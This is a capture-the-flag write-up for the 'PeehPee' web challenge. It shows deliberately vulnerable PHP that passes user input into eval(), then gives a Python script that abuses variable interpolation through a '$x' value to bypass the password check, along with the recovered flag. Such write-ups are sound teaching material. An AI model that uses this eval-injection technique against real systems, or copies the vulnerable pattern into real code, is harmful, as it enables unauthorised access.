PeehPee
Easy
150
Are you able to access the secret area of Naruto ? I guess it's not that hard for you!
View the application source code via
/?source
endpointfrom requests import get, post
url = 'https://blackhat4-1f84feb8cf11458ef1fb78a4cfea94f8-0.chals.bh.ctf.sa'
<?php
//Show Page code source
if(isset($_GET["source"])){
highlight_file(__FILE__);
}
// Juicy PHP Part
$flag=getenv("FLAG");
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if(isset($_POST["email"])&&isset($_POST["pass"])){
if($_POST["email"]==="[email protected]"){
$x=$_POST["test"];
$inp=preg_replace("/[^A-Za-z0-9$]/","",$_POST["pass"]);
if($inp==="SuperSecRetPassw0rd"){
die("Hacking Attempt detected");
}
else{
if(eval("return \$inp=\"$inp\";")==="SuperSecRetPassw0rd"){
echo $flag;
}
else{
die("Pretty Close maybe ?");
}
}
}
}
}
?>
From the source code to obtain the flag:
- The request method should be
POST
request. - The email parameter value must be
[email protected]
. - The regex match a single character not present in
a-z
orA-Z
or0-9
or$
for the pass parameter. - The pass parameter value shouldn't equal
SuperSecRetPassw0rd
. - The eval function evaluates the pass parameter value.
- The test parameter value is stored in the
$x
variable.
Since the pass parameter value is evaluated, the password
SuperSecRetPassw0rd
can be returned after evaluation via the test parameter $x
variable.data = { 'email': '[email protected]', 'test': 'SuperSecRetPassw0rd', 'pass': '$x' }
response = post(url, data = data)
import re
html = response.text
flag = re.search('BlackHatMEA{(.*)}', html)
print(flag.group(0))
BlackHatMEA{551:17:5d19f71744009b71e8809d46d3b65876dbb5adff}
Last modified 1yr ago